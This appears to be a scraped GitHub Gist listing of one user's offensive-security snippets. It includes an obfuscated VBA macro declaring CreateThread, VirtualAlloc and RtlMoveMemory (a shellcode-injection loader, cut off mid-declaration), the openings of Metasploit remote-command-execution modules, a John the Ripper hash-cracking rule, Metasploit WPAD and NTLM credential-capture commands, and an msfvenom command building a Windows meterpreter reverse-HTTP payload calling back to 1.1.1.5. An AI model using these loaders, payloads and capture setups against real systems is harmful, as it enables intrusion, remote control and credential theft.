Skip to content

Instantly share code, notes, and snippets.

Sub test()
retval = Shell("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 1)
End Sub
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Fjtcdnbu As Long, ByVal Yya As Long, ByVal Eyjfnfctp As LongPtr, Mjbaacp As Long, ByVal Irzpli As Long, Icxunn As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Kubgdfjao As Long, ByVal Dcrskv As Long, ByVal Bxzplil As Long, ByVal Wemjan As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Ppvxldjf As LongPtr, ByRef Uvzdtvuzc As Any, ByVal Cbpxabnak As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Fjtcdnbu As Long, ByVal Yya As Long, ByVal Eyjfnfctp As Long, Mjbaacp As Long, ByVal Irzpli As Long, Icxunn As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Kubgdfjao As Long, ByVal Dcrskv As Long, ByVal Bxzplil As Long, ByVal Wemjan As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Ppvxldjf As Long, ByRef Uvzdtvuzc As Any,
@ddouhine
ddouhine / geutebruck_simple_loglistjs.rb
Created August 2, 2018 07:51
Geutebruck simple_loglistjs.cgi Remote Command Execution Metasploit Module
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
/////////////////////////////////////////////////////////////////////////////////////////////
Add these lines to JtR /run/dynamic.conf:
/////////////////////////////////////////////////////////////////////////////////////////////
[List.Generic:dynamic_1591]
Expression=md5($u:ManagementRealm:$p)
CONST1=:ManagementRealm:
Flag=MGF_USERNAME
Flag=MGF_NOTSSE2Safe
Func=DynamicFunc__clean_input
Func=DynamicFunc__append_userid
@ddouhine
ddouhine / gist:b3e5c7928bd35ebbf892
Created October 7, 2015 12:58
Network/web related online tools
http://wtfismyip.com/
http://web-sniffer.net/
http://www.urlquery.net/
http://www.rexswain.com/httpview.html
http://httpbin.org
http://requestb.in
use auxiliary/server/wpad
set PROXY x.x.x.x
run
use auxiliary/server/capture/http_ntlm
set CAINPWFILE /root/cain.http.pw
set JOHNPWFILE /root/john.http.pw
set URIPATH /
set SRVPORT 80
run
3999,5000,5005,8000,8453,8787-8788,9001,18000
.../metasploit_4.11.3-2015062101-1kali0_i386.deb
root@kali:~# msfvenom -p windows/meterpreter_reverse_http exitfunc=thread lhost=1.1.1.5 R -a x86 -f exe --platform windows > meter_1.1.1.5.exe
No encoder or badchars specified, outputting raw payload